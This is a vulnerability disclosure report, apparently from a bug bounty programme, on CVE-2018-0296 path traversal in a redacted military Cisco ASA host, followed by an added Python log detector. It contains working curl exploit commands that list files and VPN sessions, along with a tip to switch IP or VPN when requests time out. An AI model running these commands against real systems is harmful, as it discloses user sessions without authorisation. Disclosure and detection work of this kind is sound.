CVSS2: 5 Medium (AV:N/AC:L/Au:N/C:N/I:N/A:P)
- Attack Vector: NETWORK
- Attack Complexity: LOW
- Authentication: NONE
- Confidentiality Impact: NONE
- Integrity Impact: NONE
- Availability Impact: PARTIAL

CVSS3: 7.5 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
- Attack Vector: NETWORK
- Attack Complexity: LOW
- Privileges Required: NONE
- User Interaction: NONE
- Scope: UNCHANGED
- Confidentiality Impact: NONE
- Integrity Impact: NONE
- Availability Impact: HIGH

AI Score: 6.7 Medium (Confidence: High)

EPSS: 0.974 High (Percentile: 99.9%)

## Description
I discovered a previously unidentified instance, https://█████████ (████.██████.mil), in the █████████ network that is vulnerable to CVE-2018-0296 (https://vulners.com/cve/CVE-2018-0296).
## POC
```
curl -i -k "https://████/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is
```
█████████
We can disclose user sessions by querying /sessions:
```
curl -i -k "https://█████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is
```
## Suggested fix
Updating to the latest version should fix the issue. A fixed version should return a 404 “File not found” error.
Example of a patched version:
```
curl -i -k "https://█████████.██████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is
```
## Notes
If you experience a request timeout when reproducing, try changing your IP/VPN.
Path traversal, which can allow an unauthenticated attacker to disclose sensitive information such as VPN sessions, files, and usernames. Under some conditions it is possible to cause DoS attacks.
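
For responders, one way to look for this request shape in HTTP logs and separate served requests from the 404 a fixed version returns. This is an added example, not part of the original report; it assumes Common Log Format lines from a proxy or sensor in front of the device, and the sample lines, addresses and function names are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Common Log Format (assumed source: a proxy or
# sensor in front of the portal; client addresses are documentation ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 4312
203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /+CSCOU+/../+CSCOE+/files/file_list.json HTTP/1.1" 200 918
203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /+CSCOU+/%2e%2e/+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1" 200 2210
192.0.2.44 - - [01/Jan/2024:10:02:30 +0000] "GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1" 404 25
198.51.100.7 - - [01/Jan/2024:10:03:00 +0000] "GET /+CSCOU+/portal.css HTTP/1.1" 200 1022
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})\b')
# Request shape from the report: a ../ segment between +CSCOU+ and +CSCOE+/files/.
TRAVERSAL_RE = re.compile(r"/\+CSCOU\+/\.\./\+CSCOE\+/files/", re.IGNORECASE)


def find_traversal(log_text):
    """Return one finding per logged request matching the report's request shape."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        parts = urlsplit(target)
        # Decode percent-escapes once so the log entry is compared in plain form.
        if not TRAVERSAL_RE.search(unquote(parts.path)):
            continue
        # Empty string means the request carried no path= parameter.
        listed = parse_qs(parts.query).get("path", [""])[0]
        # 404 is the fixed behaviour stated in the report; treating any other
        # status as "served" is a conservative triage assumption.
        outcome = "rejected" if status == "404" else "served"
        findings.append({"client": client, "listed": listed,
                         "status": int(status), "outcome": outcome})
    return findings


def exposed_session_clients(findings):
    """Clients whose /sessions listing was served: treat VPN sessions as disclosed."""
    return sorted({f["client"] for f in findings
                   if f["outcome"] == "served" and f["listed"].startswith("/sessions")})


if __name__ == "__main__":
    for finding in find_traversal(SAMPLE_LOG):
        print(finding)
```

Any client returned by `exposed_session_clients` saw session data, so the sessions active at that time should be invalidated after the device is updated.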